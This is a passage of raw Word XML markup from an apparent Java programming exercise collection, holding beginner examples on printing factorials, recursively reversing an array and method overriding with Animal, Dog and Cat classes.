      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB8755"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3E3BC2B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B693DD"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 the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115361C0"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Outpu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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9BBC5" w14:textId="77777777"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9EE0E53" w14:textId="52B99AC1" w:rsidR="003B1155" w:rsidRPr="00CE4B9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0C0850D8" w14:textId="77777777" w:rsidR="00A21DDF" w:rsidRPr="00CE4B95" w:rsidRDefault="00A21DDF" w:rsidP="00A21DDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E370A8" w14:textId="43FAEA27" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc196307802"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00DD5017" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00DA1B68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00DD5017" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint factorials of natural numbers from 1 to 10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
    </w:p>
    <w:p w14:paraId="1AA73766" w14:textId="65147F1D" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A43C418" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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actorialPrint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4C69793" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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1B1A77D" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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Factorials of numbers from 1 to 10:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57732C04" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C8BD6" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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73D90A4" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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actoria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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2E62E" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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EA53D45" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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42C2946" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D385EE2" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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ethod to calculate factorial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CF910" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> factorial</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F0BC968" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> resul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623A7884" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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82E42B5" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            resul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p>
    <w:p w14:paraId="21C20308" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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AFB0553" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B081C90" w14:textId="77777777" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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067F416" w14:textId="38E881AA" w:rsidR="00172A4C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551C72D" w14:textId="77777777" w:rsidR="00DD5017" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD5017" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C7B34F" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1634C5EE" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29053898" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F2AFAA" w14:textId="3F524403" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc196307803"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="007B542B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0038744E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="007B542B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>everse the integer array without using loops? Using recursion?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:p w14:paraId="414322B9" w14:textId="59FB5B00" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DEFEE0"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everseArrayRecursi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3E4CCC9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B912D22"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ethod to reverse the array using recursion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D63B1"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reverseArray</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star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n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4665E2F"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Base case: If start index is greater than or equal to end, return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263805AC"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start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n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E3E4DBB"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738EC41"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DCC53F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE79E8"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wap the elements at start and end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70579C42"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tem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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C128E27"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ar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end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE469E0"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en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temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE8C05"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E66E6"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Recursively call the method with updated indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E392D"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reverseArr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ar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n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1A347952"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A1F0FEF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B33929"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AA4C4F8"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4</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p>
    <w:p w14:paraId="0E25273A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E9A56"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Original Array:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253ACE9"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F1D2E0E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C8689"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D41F921"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FF4C25"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all the recursive method to reverse the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18E34F"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reverseArr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length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64D52C8E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B4223"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Reversed Array:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC530E6"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0F1CEE2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A7A2A"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C4D4A5E" w14:textId="77777777"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E0693C6" w14:textId="3D025248" w:rsidR="00C414B2" w:rsidRPr="00CE4B95"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05D35BD3" w14:textId="77777777" w:rsidR="007B542B" w:rsidRPr="00CE4B95" w:rsidRDefault="007B542B" w:rsidP="007B542B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5565018F" w14:textId="43007673" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00F60265">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc196307804"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00A00723" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F60265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B85AF9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Perform</w:t>
      </w:r>
      <w:r w:rsidR="00F60265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Overriding methods in parent child</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w14:paraId="1EF9BC18" w14:textId="7F5DE755" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215C6A1A"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F32BF"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nim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C2AB847"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ethod to be overridden in child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC7567"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soun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360C2C4"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nimal makes a sound"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221CA495"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FE2B7A1"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB6A9C"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t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625DBAF"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Child class (inherits from Animal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75698989"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Dog</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xtend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nim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CCE391D"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verriding the sound() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72008D"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368BF42B"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soun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222F262"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Dog barks"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B96E80"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1D0D042"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D250D2"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t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59732E6D"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a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xtend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nim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2C8F6E6"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verriding the sound() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4A43A"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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D3AA2"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soun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18F3277"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Cat meows"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FE25C"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3EBC92D"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27919073"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t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F6219"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ethodOverridingExamp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4431626"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CB58B10"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ing objects of child classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4EE28"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nimal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myDog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Dog</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61514C6C"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nimal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myCa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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDA78D"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6641774E"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alling the overridden methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788AD62E"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t xml:space="preserve">        myDo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oun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 Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147A3AB"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t xml:space="preserve">        myCa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oun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 Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E7B76" w14:textId="77777777"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1F9D198" w14:textId="2564188F" w:rsidR="00683F70" w:rsidRPr="00CE4B95"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6CB11452" w14:textId="77777777" w:rsidR="00F60265" w:rsidRPr="00CE4B95" w:rsidRDefault="00F60265" w:rsidP="00F60265">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262857DE" w14:textId="3C8B105D" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc196307805"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="001451D6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
